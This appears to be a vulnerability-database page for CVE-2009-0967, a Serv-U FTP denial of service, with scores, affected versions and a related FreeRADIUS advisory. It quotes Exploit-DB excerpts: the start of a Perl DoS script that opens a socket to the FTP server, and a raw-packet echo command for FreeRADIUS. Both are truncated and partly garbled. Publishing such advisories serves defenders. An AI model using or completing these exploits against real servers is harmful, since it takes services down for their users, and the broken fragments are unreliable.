CVE-2009-0967
published 2009-03-19CVE-2009-0967: The FTP server in Serv-U 7.0.0.1 through 7.4.0.1 allows remote authenticated users to cause a denial of service (service hang) via a large number of SMNT…
PriorityP419medium4CVSS 2.0
AVNACLAuSCNINAP
EXPLOIT
EPSS
7.03%
93.4th percentile
The FTP server in Serv-U 7.0.0.1 through 7.4.0.1 allows remote authenticated users to cause a denial of service (service hang) via a large number of SMNT commands without an argument.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
CVSS provenance
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:N/I:N/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f8vp-2v87-h22x: The FTP server in Serv-U 7
ghsa_unreviewed·2022-05-02
CVE-2009-0967 [MEDIUM] GHSA-f8vp-2v87-h22x: The FTP server in Serv-U 7
The FTP server in Serv-U 7.0.0.1 through 7.4.0.1 allows remote authenticated users to cause a denial of service (service hang) via a large number of SMNT commands without an argument.
Red Hat
FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
vendor_redhat·2009-09-07·CVSS 5.0
CVE-2009-3111 [MEDIUM] FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. NOTE: this is a regression error related to CVE-2003-0967.
No detection rules found.
Exploit-DB
RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' (Authenticated) Denial of Service
exploitdb·2009-03-16
CVE-2009-0967 RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' (Authenticated) Denial of Service
RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' (Authenticated) Denial of Service
---
#!/usr/bin/perl
# Soft : FTP Serv-U
# Version : v7.4.0.1
#
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)
# Just the server is saturated, it stops responding.
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan \n";
print "[+] Soft: FTP Serv-U\n";
if (@ARGV \n";
print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending request...\n";
$evil
Exploit-DB
FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
exploitdb·2003-11-20
CVE-2003-0967 FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
---
source: https://www.securityfocus.com/bid/9079/info
FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x
2009-03-19
Published